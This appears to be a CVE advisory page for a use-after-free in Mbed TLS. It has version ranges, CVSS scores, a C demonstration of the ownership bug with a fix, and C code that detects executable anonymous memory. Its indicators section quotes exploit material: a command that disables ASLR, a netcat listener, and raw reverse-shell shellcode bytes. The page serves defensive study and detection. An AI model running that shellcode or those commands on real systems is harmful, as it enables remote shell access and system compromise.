CVE-2025-47917
published 2025-07-20


Priority: P261
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 1.99% (78.2th percentile)
Mbed TLS before 3.6.4 allows a use-after-free in certain situations of applications that are developed in accordance with the documentation. The function mbedtls_x509_string_to_names() takes a head argument that is documented as an output argument. The documentation does not suggest that the function will free that pointer; however, the function does call mbedtls_asn1_free_named_data_list() on that argument, which performs a deep free(). As a result, application code that uses this function (relying only on documented behavior) is likely to still hold pointers to the memory blocks that were freed, resulting in a high risk of use-after-free or double-free. In particular, the two sample programs x509/cert_write and x509/cert_req are affected (use-after-free if the san string contains more than one DN).
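The ownership mistake the description above turns on, as an added worked example in C (not Mbed TLS code and not the PoC): a toy name list and a toy "K=V,K=V" parser stand in for mbedtls_x509_name and mbedtls_x509_string_to_names(), and every function, type and variable name below is an assumption for illustration only. The vulnerable variant deep-frees whatever *head already points to, which is the undocumented behaviour the CVE describes. The caller that reuses one head across two DN entries, as cert_write did, is shown beside a caller that gives each entry a fresh NULL head, and beside a hardened library contract that refuses a non-NULL head (an illustrative design, not the Mbed TLS 3.6.4 patch). Freed node addresses are recorded so the dangling pointer can be shown without ever dereferencing freed memory.

```c
/* Added example, not Mbed TLS code and not the PoC: a toy model of the ownership bug behind
 * CVE-2025-47917. Every name below is an invented stand-in; only the ownership pattern is real. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct name { char *val; struct name *next; } name_t;   /* one "K=V" component */

/* Record every freed node address so the demo can show a pointer dangles without ever
 * dereferencing freed memory; live_nodes catches leaks and double frees in the fixed path. */
#define MAX_FREED 64
static uintptr_t freed_addrs[MAX_FREED];
static size_t n_freed;
static int live_nodes;
static int live_node_count(void) { return live_nodes; }

static void free_list(name_t *h) {
    for (name_t *nx = NULL; h; h = nx) {
        nx = h->next;
        if (n_freed < MAX_FREED) freed_addrs[n_freed++] = (uintptr_t)h;
        free(h->val); free(h); live_nodes--;
    }
}
static int was_freed(const name_t *p) {
    for (size_t i = 0; i < n_freed; i++) if (freed_addrs[i] == (uintptr_t)p) return 1;
    return 0;
}

/* Build a fresh list from "K=V,K=V,..." at *head, which must be NULL on entry. */
static int parse_names(name_t **head, const char *s) {
    name_t **tail = head;
    for (const char *p = s; *p; ) {
        const char *comma = strchr(p, ',');
        size_t len = comma ? (size_t)(comma - p) : strlen(p);
        name_t *n = calloc(1, sizeof *n);
        if (!n || !(n->val = malloc(len + 1))) { free(n); free_list(*head); *head = NULL; return -1; }
        memcpy(n->val, p, len); n->val[len] = '\0';
        live_nodes++;
        *tail = n; tail = &n->next;
        p = comma ? comma + 1 : p + len;
    }
    return 0;
}

/* Pre-3.6.4 behaviour as the CVE describes it: *head is documented as an output argument,
 * yet the function starts by deep-freeing whatever it already points to. */
static int string_to_names_vuln(name_t **head, const char *s) {
    free_list(*head);                   /* the undocumented deep free */
    *head = NULL;
    return parse_names(head, s);
}
/* One hardened contract (an illustration, not the Mbed TLS 3.6.4 patch): never free
 * caller memory; a non-NULL *head is a caller bug and is rejected with -2. */
static int string_to_names_hardened(name_t **head, const char *s) {
    return *head != NULL ? -2 : parse_names(head, s);
}

#define N_DN 2
static const char *const DN_ENTRIES[N_DN] = { "CN=AAAA,O=Example", "CN=BBBB" };  /* constructed */
/* cert_write's pattern: one shared head reused for every DN-type SAN entry, with each SAN
 * node keeping its own reference. Returns 1 when entry 0 is left pointing at freed memory. */
static int vulnerable_caller(void) {
    name_t *san[N_DN], *shared_head = NULL;
    n_freed = 0;
    for (int i = 0; i < N_DN; i++) {
        if (string_to_names_vuln(&shared_head, DN_ENTRIES[i]) != 0) return -1;
        san[i] = shared_head;
    }
    int dangling = was_freed(san[0]);   /* the second call freed entry 0's list */
    free_list(shared_head);             /* only the last list is still live */
    return dangling;
}
/* Caller-side fix: a fresh NULL head per entry; each entry owns its list and frees it once. */
static int fixed_caller(void) {
    name_t *san[N_DN];
    n_freed = 0;
    for (int i = 0; i < N_DN; i++) {
        name_t *head = NULL;            /* nothing here for the library to free */
        if (string_to_names_hardened(&head, DN_ENTRIES[i]) != 0) return -1;
        san[i] = head;
    }
    int dangling = 0;
    for (int i = 0; i < N_DN; i++) { dangling |= was_freed(san[i]); free_list(san[i]); }
    return dangling;                    /* 0, with live_node_count() back to 0 */
}
/* The hardened API refuses a second call on a live head instead of silently freeing it. */
static int hardened_rejects_reuse(void) {
    name_t *head = NULL;
    int rc = string_to_names_hardened(&head, "CN=AAAA");
    if (rc == 0) rc = string_to_names_hardened(&head, "CN=BBBB");
    free_list(head);
    return rc;                          /* -2 */
}

int main(void) {
    printf("vulnerable caller, entry 0 dangles: %d\n", vulnerable_caller());
    printf("fixed caller, anything dangling: %d\n", fixed_caller());
    printf("hardened API on a reused head: %d\n", hardened_rejects_reuse());
    return live_node_count();           /* exit status 0 only if nothing leaked */
}
```

The exit status is the number of nodes still live, so 0 means the fixed paths freed everything exactly once. The caller-side fix (a NULL head per call, one owner per list) is the only one available to applications that cannot upgrade the library yet; in the vulnerable path the dangling pointer is reported from the recorded addresses, never by reading the freed node.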

Affected

10 ranges

Vendor | Product  | Version range                    | Fixed in
arm    | mbed_tls | < 3.6.4                          | 3.6.4
debian | mbedtls  | < 2.16.9-0.1+deb11u3 (bullseye)  | 2.16.9-0.1+deb11u3 (bullseye)
mbed   | mbedtls  | < 3.6.4                          | 3.6.4
mbed   | mbedtls  | >= 0, < 2.16.9-0.1+deb11u3       | 2.16.9-0.1+deb11u3
mbed   | mbedtls  | >= 0, < 3.6.4-1                  | 3.6.4-1
mbed   | mbedtls  | >= 0, < 3.6.4-1                  | 3.6.4-1
mbed   | mbedtls  | >= 0, < 2.8.0-1ubuntu0.1~esm1    | 2.8.0-1ubuntu0.1~esm1
mbed   | mbedtls  | >= 0, < 2.16.4-1ubuntu2+esm1     | 2.16.4-1ubuntu2+esm1
mbed   | mbedtls  | >= 0, < 2.28.0-1ubuntu0.1~esm1   | 2.28.0-1ubuntu0.1~esm1
mbed   | mbedtls  | >= 0, < 2.28.8-1ubuntu0.1~esm1   | 2.28.8-1ubuntu0.1~esm1

Detection & IOCs (extracted from sources)

command: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
ip: 192.168.92.187
port: 4454
command: nc -lvnp 4454
bytes: 48 31 d2 b8 29 00 00 00 be 01 00 00 00 bf 02 00 00 00 0f 05 48 89 c7 49 89 c4 48 83 ec 10 c7 44 24 0c bd 5c a8 c0 66 c7 44 24 0a 11 c1 66 c7 44 24 08 02 00 48 89 e6 ba 10 00 00 00 b8 2a 00 00 00 0f 05 4c 89 e7 be 02 00 00 00 b8 21 00 00 00 0f 05 48 ff ce 79 f4 48 31 d2 48 b8 62 2f 73 62 61 73 68 00 50 48 b8 2f 75 73 72 2f 62 69 6e 50 48 89 e7 52 57 48 89 e6 b8 3b 00 00 00 0f 05
  • Trigger condition: the use-after-free occurs when mbedtls_x509_string_to_names() is called again with a head pointer that still refers to the list an earlier call returned; the second call deep-frees that list while the caller still holds pointers into it. In cert_write and cert_req this happens when the san string contains more than one DN (e.g., 'CN=AAAA,CN=BBBB').
  • The exploit requires ASLR to be disabled (/proc/sys/kernel/randomize_va_space == 0) for reliable exploitation; detect attempts to disable ASLR as a precursor indicator.
  • The exploit shellcode connects back to a remote IP on port 4454 and execve()s a shell; the sources give the path as /usr/bin/sbash, but the two strings actually pushed in the published bytes are '/usr/bin' followed by 'b/sbash', which does not form a valid binary path, so treat the path as PoC-specific rather than as a signature. Monitor for unexpected outbound connections on port 4454 from processes linked to mbedtls.
  • The exploit uses mmap with PROT_READ|PROT_WRITE|PROT_EXEC and MAP_ANON|MAP_PRIVATE to allocate executable shellcode pages; detect anonymous RWX memory mappings in processes using mbedtls.
  • Vulnerable code path: mbedtls_x509_string_to_names() internally calls mbedtls_asn1_free_named_data_list() on the head argument without documenting this behavior, performing a deep free. Monitor for double-free or heap corruption signals in applications calling this function.
  • The exploit PoC hardcodes a private LAN IP (192.168.92.187) as the reverse-shell callback target; this is a lab/test address and will differ in real-world attacks. Note also that the immediate the shellcode stores for sin_addr (0xc0a85cbd, which lands in memory as bd 5c a8 c0) does not decode to that address, so verify the byte string and the listed IP/port against each other before building a signature on either.
  • Exploitation against hardened systems with ASLR enabled is significantly less reliable than the ASLR-disabled setup the PoC assumes.
  • The exploit title states 'Mbed TLS 3.6.4 - Use-After-Free', but the CVE and NVD description state that the vulnerability affects versions *before* 3.6.4; 3.6.4 is the fixed version.
  • MicroPython is not affected by this CVE despite using Mbed TLS, because it does not call the vulnerable function mbedtls_x509_string_to_names().
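The anonymous-RWX indicator from the detection list above, as an added example in C that is not from the PoC, from Mbed TLS, or from any detection product: a parser for /proc/<pid>/maps lines and a scanner that counts mappings that are readable, writable, executable and file-less (inode 0), which is how a mmap(PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE) region appears. SAMPLE_MAPS is a constructed excerpt (the library path in it is illustrative) and all function and type names are assumptions.

```c
/* Added example, not from the PoC or Mbed TLS: the "anonymous RWX mapping" indicator as a
 * /proc/<pid>/maps classifier. SAMPLE_MAPS below is constructed test data. */
#include <stdio.h>
#include <string.h>

typedef struct {
    unsigned long long start, end, inode;
    char perms[5];
    char path[256];
} map_region_t;

/* Parse one maps line: "start-end perms offset dev inode [path]". Returns 0 on success. */
static int parse_maps_line(const char *line, map_region_t *r) {
    unsigned long long offset;
    char dev[32];
    int consumed = 0;
    memset(r, 0, sizeof *r);
    if (sscanf(line, "%llx-%llx %4s %llx %31s %llu%n", &r->start, &r->end, r->perms,
               &offset, dev, &r->inode, &consumed) != 6)
        return -1;
    const char *p = line + consumed;
    while (*p == ' ' || *p == '\t') p++;
    size_t n = strcspn(p, "\r\n");
    if (n >= sizeof r->path) n = sizeof r->path - 1;
    memcpy(r->path, p, n);
    r->path[n] = '\0';
    return 0;
}

/* The indicator: readable, writable and executable, and not backed by a file (inode 0).
 * [heap] and [stack] are flagged too; neither should ever be RWX. */
static int is_rwx_anon(const map_region_t *r) {
    return r->perms[0] == 'r' && r->perms[1] == 'w' && r->perms[2] == 'x' && r->inode == 0;
}

/* Scan a whole maps text; returns the number of RWX anonymous regions and, via *bytes,
 * their total size. Lines that do not parse are skipped. */
static int scan_rwx_anon(const char *maps_text, unsigned long long *bytes) {
    int hits = 0;
    *bytes = 0;
    for (const char *p = maps_text; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        size_t copy = len < sizeof line - 1 ? len : sizeof line - 1;
        memcpy(line, p, copy); line[copy] = '\0';
        map_region_t r;
        if (parse_maps_line(line, &r) == 0 && is_rwx_anon(&r)) { hits++; *bytes += r.end - r.start; }
        p = nl ? nl + 1 : p + len;
    }
    return hits;
}
static int count_rwx_anon(const char *maps_text) { unsigned long long b; return scan_rwx_anon(maps_text, &b); }
static unsigned long long rwx_anon_bytes(const char *maps_text) { unsigned long long b; scan_rwx_anon(maps_text, &b); return b; }

/* Constructed sample: a file-backed text segment for an Mbed TLS shared object (path is
 * illustrative), an ordinary rw heap, one anonymous RWX page (the hit), and the stack. */
static const char SAMPLE_MAPS[] =
    "7f3a1c000000-7f3a1c0a0000 r-xp 00000000 fd:01 1834507                    /usr/local/lib/libmbedtls.so\n"
    "5581aa2c0000-5581aa2e1000 rw-p 00000000 00:00 0                          [heap]\n"
    "7f3a1c3f0000-7f3a1c3f1000 rwxp 00000000 00:00 0\n"
    "7ffd7b9e0000-7ffd7ba01000 rw-p 00000000 00:00 0                          [stack]\n";

int main(void) {
    unsigned long long bytes;
    int hits = scan_rwx_anon(SAMPLE_MAPS, &bytes);
    printf("sample: %d RWX anonymous region(s), %llu bytes\n", hits, bytes);
    FILE *f = fopen("/proc/self/maps", "r");          /* Linux only; silently skipped elsewhere */
    if (f) {
        static char buf[1 << 16];
        size_t n = fread(buf, 1, sizeof buf - 1, f);
        buf[n] = '\0';
        fclose(f);
        hits = scan_rwx_anon(buf, &bytes);
        printf("this process: %d RWX anonymous region(s), %llu bytes\n", hits, bytes);
    }
    return 0;
}
```

JIT runtimes (JavaScript engines, some language VMs) legitimately create RWX anonymous mappings, so scope the rule to processes that have libmbedtls mapped, or alert on an existing anonymous region becoming executable rather than on every hit; running the scanner against a process other than your own needs ptrace-equivalent rights to read its maps file.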

CVSS provenance

nvd (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv: 9.8 CRITICAL
vendor_ubuntu: 9.8 CRITICAL
vendor_debian: 8.9 HIGH